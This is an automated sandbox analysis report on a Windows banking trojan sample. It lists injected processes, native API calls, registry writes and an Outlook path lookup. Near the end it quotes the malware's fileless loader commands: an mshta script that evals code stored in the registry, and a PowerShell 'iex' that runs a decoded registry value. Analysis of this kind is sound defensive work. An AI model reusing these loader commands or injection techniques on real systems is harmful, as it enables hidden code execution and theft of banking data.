Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5AFC0 1_2_03C5AFC0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C57FBE 1_2_03C57FBE
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5836E 1_2_03C5836E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEB006 1_2_01FEB006
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE13FA 1_2_01FE13FA
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FF2D8C 1_2_01FF2D8C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC59E4 20_2_00CC59E4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC7548 20_2_00CC7548
Source: C:\Windows\System32\control.exe Code function: 20_2_00CAC3E4 20_2_00CAC3E4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA9098 20_2_00CA9098
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC8448 20_2_00CC8448
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB1C44 20_2_00CB1C44
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC0468 20_2_00CC0468
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA847C 20_2_00CA847C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBC400 20_2_00CBC400
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB4818 20_2_00CB4818
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA5420 20_2_00CA5420
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB0DC8 20_2_00CB0DC8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBCDC4 20_2_00CBCDC4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBB1D0 20_2_00CBB1D0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA65A8 20_2_00CA65A8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA29B0 20_2_00CA29B0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC91B0 20_2_00CC91B0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC3D68 20_2_00CC3D68
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB8974 20_2_00CB8974
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB993C 20_2_00CB993C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB52D0 20_2_00CB52D0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBDEE8 20_2_00CBDEE8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB2A90 20_2_00CB2A90
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC9AA8 20_2_00CC9AA8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CAAAB4 20_2_00CAAAB4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB5AB4 20_2_00CB5AB4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB220C 20_2_00CB220C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA5A1C 20_2_00CA5A1C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA1638 20_2_00CA1638
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA9FC4 20_2_00CA9FC4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CACFF8 20_2_00CACFF8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB77A0 20_2_00CB77A0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC1B4C 20_2_00CC1B4C
Source: C:\Windows\System32\control.exe Code function: 20_2_00CA3764 20_2_00CA3764
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC137C 20_2_00CC137C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C817548 26_2_000002970C817548
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C8159E4 26_2_000002970C8159E4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C801C44 26_2_000002970C801C44
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C818448 26_2_000002970C818448
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F5420 26_2_000002970C7F5420
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C810468 26_2_000002970C810468
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F9FC4 26_2_000002970C7F9FC4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F9098 26_2_000002970C7F9098
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7FC3E4 26_2_000002970C7FC3E4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F847C 26_2_000002970C7F847C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7FCFF8 26_2_000002970C7FCFF8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80C400 26_2_000002970C80C400
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C804818 26_2_000002970C804818
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80993C 26_2_000002970C80993C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C813D68 26_2_000002970C813D68
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C808974 26_2_000002970C808974
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C8191B0 26_2_000002970C8191B0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F29B0 26_2_000002970C7F29B0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F65A8 26_2_000002970C7F65A8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F5A1C 26_2_000002970C7F5A1C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C802A90 26_2_000002970C802A90
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C819AA8 26_2_000002970C819AA8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C805AB4 26_2_000002970C805AB4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7FAAB4 26_2_000002970C7FAAB4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80CDC4 26_2_000002970C80CDC4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C800DC8 26_2_000002970C800DC8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80B1D0 26_2_000002970C80B1D0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80220C 26_2_000002970C80220C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F1638 26_2_000002970C7F1638
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C811B4C 26_2_000002970C811B4C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C81137C 26_2_000002970C81137C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C8077A0 26_2_000002970C8077A0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C8052D0 26_2_000002970C8052D0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80DEE8 26_2_000002970C80DEE8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C7F3764 26_2_000002970C7F3764
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C82B5A4 26_2_000002970C82B5A4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E700C3E4 27_2_00000228E700C3E4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7027548 27_2_00000228E7027548
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70259E4 27_2_00000228E70259E4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7011C44 27_2_00000228E7011C44
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7028448 27_2_00000228E7028448
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7020468 27_2_00000228E7020468
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E700847C 27_2_00000228E700847C
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7009098 27_2_00000228E7009098
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7021B4C 27_2_00000228E7021B4C
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7003764 27_2_00000228E7003764
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E702137C 27_2_00000228E702137C
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70177A0 27_2_00000228E70177A0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7009FC4 27_2_00000228E7009FC4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E700CFF8 27_2_00000228E700CFF8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701C400 27_2_00000228E701C400
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7014818 27_2_00000228E7014818
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7005420 27_2_00000228E7005420
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7001638 27_2_00000228E7001638
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7012A90 27_2_00000228E7012A90
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7029AA8 27_2_00000228E7029AA8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E700AAB4 27_2_00000228E700AAB4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7015AB4 27_2_00000228E7015AB4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70152D0 27_2_00000228E70152D0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701DEE8 27_2_00000228E701DEE8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701993C 27_2_00000228E701993C
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7023D68 27_2_00000228E7023D68
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7018974 27_2_00000228E7018974
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70065A8 27_2_00000228E70065A8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70029B0 27_2_00000228E70029B0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70291B0 27_2_00000228E70291B0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701CDC4 27_2_00000228E701CDC4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7010DC8 27_2_00000228E7010DC8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701B1D0 27_2_00000228E701B1D0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701220C 27_2_00000228E701220C
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7005A1C 27_2_00000228E7005A1C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1167548 32_2_000001F4F1167548
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11659E4 32_2_000001F4F11659E4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F114847C 32_2_000001F4F114847C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1149098 32_2_000001F4F1149098
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115993C 32_2_000001F4F115993C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1163D68 32_2_000001F4F1163D68
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F116137C 32_2_000001F4F116137C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11577A0 32_2_000001F4F11577A0
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1149FC4 32_2_000001F4F1149FC4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F114C3E4 32_2_000001F4F114C3E4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F114CFF8 32_2_000001F4F114CFF8
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115C400 32_2_000001F4F115C400
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1154818 32_2_000001F4F1154818
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1145420 32_2_000001F4F1145420
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1168448 32_2_000001F4F1168448
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1151C44 32_2_000001F4F1151C44
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1160468 32_2_000001F4F1160468
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1152A90 32_2_000001F4F1152A90
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1169AA8 32_2_000001F4F1169AA8
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11552D0 32_2_000001F4F11552D0
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F114AAB4 32_2_000001F4F114AAB4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1155AB4 32_2_000001F4F1155AB4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115DEE8 32_2_000001F4F115DEE8
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1161B4C 32_2_000001F4F1161B4C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1143764 32_2_000001F4F1143764
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1158974 32_2_000001F4F1158974
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11465A8 32_2_000001F4F11465A8
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11429B0 32_2_000001F4F11429B0
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F11691B0 32_2_000001F4F11691B0
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1150DC8 32_2_000001F4F1150DC8
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115CDC4 32_2_000001F4F115CDC4
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115B1D0 32_2_000001F4F115B1D0
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115220C 32_2_000001F4F115220C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1145A1C 32_2_000001F4F1145A1C
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1141638 32_2_000001F4F1141638
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFB006 40_2_00FFB006
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF13FA 40_2_00FF13FA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_01002D8C 40_2_01002D8C
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE60AD CreateProcessAsUserW, 1_2_01FE60AD
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
PE file contains strange resources
Source: anIV2qJeLD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: anIV2qJeLD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: anIV2qJeLD.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401703 NtMapViewOfSection, 1_2_00401703
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401C90 GetProcAddress,NtCreateSection,memset, 1_2_00401C90
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_004019A0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C55CD1 GetProcAddress,NtCreateSection,memset, 1_2_03C55CD1
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C59E79 NtMapViewOfSection, 1_2_03C59E79
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C59A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_03C59A0F
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5B1E5 NtQueryVirtualMemory, 1_2_03C5B1E5
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE41CB memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_01FE41CB
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE0179 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_01FE0179
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDB156 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_01FDB156
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE5021 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_01FE5021
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE0BF5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_01FE0BF5
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE92D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_01FE92D7
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FF051D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_01FF051D
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE44DF NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_01FE44DF
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE07E8 NtQueryInformationProcess, 1_2_01FE07E8
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEC779 GetProcAddress,NtCreateSection,memset, 1_2_01FEC779
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDEED0 NtMapViewOfSection, 1_2_01FDEED0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDE683 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_01FDE683
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FF017E VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_01FF017E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEC864 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_01FEC864
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEFBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_01FEFBD1
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FD2357 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_01FD2357
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDB347 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_01FDB347
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE6C90 NtGetContextThread,RtlNtStatusToDosError, 1_2_01FE6C90
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE0465 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_01FE0465
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FD840D NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_01FD840D
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDA63D memset,NtQueryInformationProcess, 1_2_01FDA63D
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB74E0 RtlAllocateHeap,NtQueryInformationProcess, 20_2_00CB74E0
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC70F8 NtCreateSection, 20_2_00CC70F8
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBB080 NtMapViewOfSection, 20_2_00CBB080
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB8844 NtWriteVirtualMemory, 20_2_00CB8844
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB8078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 20_2_00CB8078
Source: C:\Windows\System32\control.exe Code function: 20_2_00CAB964 NtReadVirtualMemory, 20_2_00CAB964
Source: C:\Windows\System32\control.exe Code function: 20_2_00CBB164 NtQueryInformationProcess, 20_2_00CBB164
Source: C:\Windows\System32\control.exe Code function: 20_2_00CB3104 NtAllocateVirtualMemory, 20_2_00CB3104
Source: C:\Windows\System32\control.exe Code function: 20_2_00CC4200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 20_2_00CC4200
Source: C:\Windows\System32\control.exe Code function: 20_2_00CAC3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose, 20_2_00CAC3E4
Source: C:\Windows\System32\control.exe Code function: 20_2_00CDB038 NtProtectVirtualMemory,NtProtectVirtualMemory, 20_2_00CDB038
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C80B164 NtQueryInformationProcess, 26_2_000002970C80B164
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C814200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 26_2_000002970C814200
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_000002970C82B002 NtProtectVirtualMemory,NtProtectVirtualMemory, 26_2_000002970C82B002
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7018844 NtWriteVirtualMemory, 27_2_00000228E7018844
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701B080 NtMapViewOfSection, 27_2_00000228E701B080
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70174E0 NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 27_2_00000228E70174E0
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E70270F8 NtCreateSection, 27_2_00000228E70270F8
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E700C3E4 NtSetContextThread,NtUnmapViewOfSection, 27_2_00000228E700C3E4
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E701B164 NtQueryInformationProcess, 27_2_00000228E701B164
Source: C:\Windows\System32\cmd.exe Code function: 27_2_00000228E7024200 NtQueryInformationToken,NtQueryInformationToken, 27_2_00000228E7024200
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F115B164 NtQueryInformationProcess, 32_2_000001F4F115B164
Source: C:\Windows\System32\PING.EXE Code function: 32_2_000001F4F1164200 NtQueryInformationToken,NtQueryInformationToken, 32_2_000001F4F1164200
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF5021 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 40_2_00FF5021
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF0BF5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 40_2_00FF0BF5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_0100051D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 40_2_0100051D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF07E8 NtQueryInformationProcess, 40_2_00FF07E8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_0100017E VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 40_2_0100017E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFC864 NtQuerySystemInformation,RtlNtStatusToDosError, 40_2_00FFC864
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFFBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 40_2_00FFFBD1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FEB347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 40_2_00FEB347
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FEA63D memset,NtQueryInformationProcess, 40_2_00FEA63D
Sample file is different than original file name gathered from version info
Source: anIV2qJeLD.exe, 00000001.00000003.821108494.0000000005E34000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs anIV2qJeLD.exe
Source: anIV2qJeLD.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211123 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@33/21@11/6
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\anIV2qJeLD.exe "C:\Users\user\Desktop\anIV2qJeLD.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD669.tmp" "c:\Users\user\AppData\Local\Temp\pqwen5zh\CSC508E00641FC7448693989664B7E60.TMP"
